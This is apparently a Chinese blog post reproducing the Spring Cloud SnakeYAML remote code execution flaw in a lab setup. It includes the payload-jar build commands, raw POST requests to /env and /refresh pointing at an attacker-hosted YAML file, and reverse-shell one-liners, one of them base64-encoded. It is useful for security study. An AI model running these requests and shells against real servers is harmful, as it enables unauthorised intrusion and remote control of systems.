Springboot远程代码执行(spring cloud SnakeYAML RCE)

最新推荐文章于 2024-07-24 10:11:49 发布
最新推荐文章于 2024-07-24 10:11:49 发布
阅读量789 收藏 1
点赞数 1
文章标签: spring boot spring cloud java
原文链接:https://blog.csdn.net/lhh134/article/details/106845548
版权

0x01 漏洞原理

  1. spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址
  2. refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容
  3. SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作
  4. 先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件
  5. 然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化
  6. 实例化类时执行恶意代码,造成 RCE 漏洞

0x02 利用条件

  • 可以 POST 请求目标网站的 /env 接口设置属性
  • 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
  • 目标依赖的 spring-cloud-starter 版本 < 1.3.0.RELEASE
  • 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

0x03 漏洞复现

1、拉取漏洞环境(repository/springcloud-snakeyaml-rce),运行环境,推荐在docker下运行。

//拉取
git clone https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springcloud-snakeyaml-rce
//运行
mvn install
mvn spring-boot:run

在这里插入图片描述
2、访问目标url。搭建成功。
在这里插入图片描述
3、自定义命令,编译java文件,生成jar文件。(详细:https://github.com/artsploit/yaml-payload)

git clone https://github.com/artsploit/yaml-payload.git
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

在这里插入图片描述在这里插入图片描述
4、新建example.yml文件,编辑图中内容。将yaml-payload.jar文件和example.yml文件拷贝到相同目录下。并使用python开启80端口的web服务。
在这里插入图片描述
在这里插入图片描述5、设置 spring.cloud.bootstrap.location 属性
spring 1.x

POST /env HTTP/1.1
Host: 140.143.30.49:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

spring.cloud.bootstrap.location=http://you-vps-ip/example.yml

在这里插入图片描述
刷新配置。

POST /refresh HTTP/1.1
Host: 140.143.30.49:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

在这里插入图片描述

5、命令成功执行。
在这里插入图片描述
6、反弹shell

bash -i >& /dev/tcp/ip/53 0>&1
命令转换网站(https://x.hacking8.com/?post=293)
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80OS4yMzUuMjEyLjExOC81MyAwPiYx}|{base64,-d}|{bash,-i}

在这里插入图片描述

0x04 参考

https://github.com/LandGrey/SpringBootVulExploit

zxl2605
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Boot Actuator 漏洞复现合集
drnrrwfs的博客
06-12 9513
Spring Boot Actuator 未授权访问漏洞在日常的测试中还是能碰到一些的,这种未授权在某些情况下是可以达到RCE的效果的,所以还有有一定价值的,下面就是对这一系列漏洞复现。基本上就是参考这篇文章的做的复现:LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list (github.com)Spring Boot Actuator端点通过 JMX 和HTTP 公开暴露给外界访问,大多数时候我们使用基
Spring Boot RCE到内存马探索
小王的储物间
02-13 1237
SpringBootVulExploit是Spring Boot漏洞Checklist,但在真正的环境中进行漏洞利用还是有一段距离的,因此衍生出了SpringBootExploit工具。本文是对该Checklist到内存马探索之路的记录。可能是大多数人没有需求,或者是安全研究员没有打红队的原因。导致利用方式普遍都是以弹计算器为最终结果,不能进一步深入利用,导致很多漏洞不了了之。目前网上普遍分析文章,复现文章都是以弹计算器结束,但这其实与实战化的需求还存在着很远的一段路程。
spring cloud SnakeYAML RCE 漏洞复现
为之的博客
11-17 2404
漏洞成因 通过/env post提交数据以设置属性spring.cloud.bootstrap.location为外部恶意yml文件,再通过/refresh获取yml文件内容并解析导致漏洞。 debug过程 由于最后是通过/refresh请求导致的,故这次从refresh相关代码开始,在RefreshEndpoint类中,有这么一段代码: @ManagedOperation public String[] refresh() { Set<String> keys = t
springboot项目启动报错org.yaml.snakeyaml.error.YAMLException。问题就是配置文件设置的编码格式不对
xiaoj314的博客
06-20 351
springboot项目启动报错org.yaml.snakeyaml.error.YAMLException: java.nio.charset.MalformedInputException: Input length = 2。解决方案为修改项目编码格式为utf-8或者添加resources目录,单独设置为utf-8
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
网络安全。
06-18 8544
0x01 漏洞原理 spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址 refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容 SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作 先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件 然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 2583
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码
SpringBoot历史漏洞复现
weixin_53747497的博客
04-01 6019
Spring框架为开发Java应用程序提供了全面的基础架构支持。它包含一些很好的功能,如依赖注入和开 箱即用的模块,如:Spring JDBC 、Spring MVC 、Spring Security、 Spring AOP 、Spring ORM 、 Spring Test,这些模块缩短应用程序的开发时间,提高了应用开发的效率例如,在Java Web开发的早 期阶段,我们需要编写大量的代码来将记录插入到数据库中。
如何防范SpringBoot 相关漏洞?
程序猿DD
08-29 888
Spring Boot可能是习惯于用Java的小伙伴们用的最多的一种应用框架,但是各位程序猿小伙伴知不知道Spring Boot有哪些平时不容易注意到的漏洞需要避免呢?小编今天就给大家介绍...
SpringBoot漏洞大全
热门推荐
yggcwhat
05-28 1万+
SpringBoot漏洞大全
【网络安全】Nacos Client Yaml反序列化漏洞分析
HBohan的博客
10-15 5610
背景 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。 Nacos是阿里巴巴于2018年开源的项目,目前在Github中已获得 19.8kSt,由此可见其的使用广泛程度。 未授权访问漏洞 threedr3am师傅在去年十二月份的时候在Github上.
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹...
Apache Flink 未授权访问+远程代码执行.pdf
04-30
### Apache Flink 未授权访问与远程代码执行漏洞解析及防范 #### 一、漏洞概述 **Apache Flink**是一款高性能、分布式、流处理引擎,它支持事件驱动的数据流处理和批处理作业。由于其出色的性能表现,在大数据处理...
用友NC BeanShell远程代码执行
09-07
# 用友NC BeanShell远程代码执行 # CNVD-2021-30167 ## 漏洞描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.[servlet]...
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
1.漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot ...攻击者可以发送特制的恶意请求,从而远程执行任意代码。 2.影响版本 3.1.0 3.0.0至3.0.6 Spring Cloud Gateway 其他已不再更新的版本
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
Spring boot 2.0 升级到 3.3.1 的相关问题 (五)
最新发布
飞一站的博客
07-24 559
解决Spring boot 2.0 升级到3.3.1 版本的druid 配置和Redis配置不生效的问题。
Java面试八股之简述spring boot的目录结构
u012151345的博客
07-23 678
application.properties 或 application.yml:是 Spring Boot 的主要配置文件,可以有多个版本,例如 application-dev.yml 和 application-prod.yml,分别用于开发和生产环境。Spring Boot 项目遵循标准的 Maven 或 Gradle 项目布局,并且有一些约定的目录用于组织不同的项目组件。src/test/java 和 src/test/resources:包含测试相关的 Java 代码和资源文件。
Spring Boot 项目中使用事件发布和监听来实现消息推送和处理
servepeople的博客
07-23 725
首先,定义一个事件类,该类继承自import org} }} }
springcloudgateway-rce
02-22
然而,Spring Cloud Gateway在某些情况下可能存在远程代码执行RCE)的安全漏洞。 具体来说,该漏洞是由于Spring Cloud Gateway在处理请求时未正确验证请求头中的特定字段,导致攻击者可以构造恶意请求并执行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值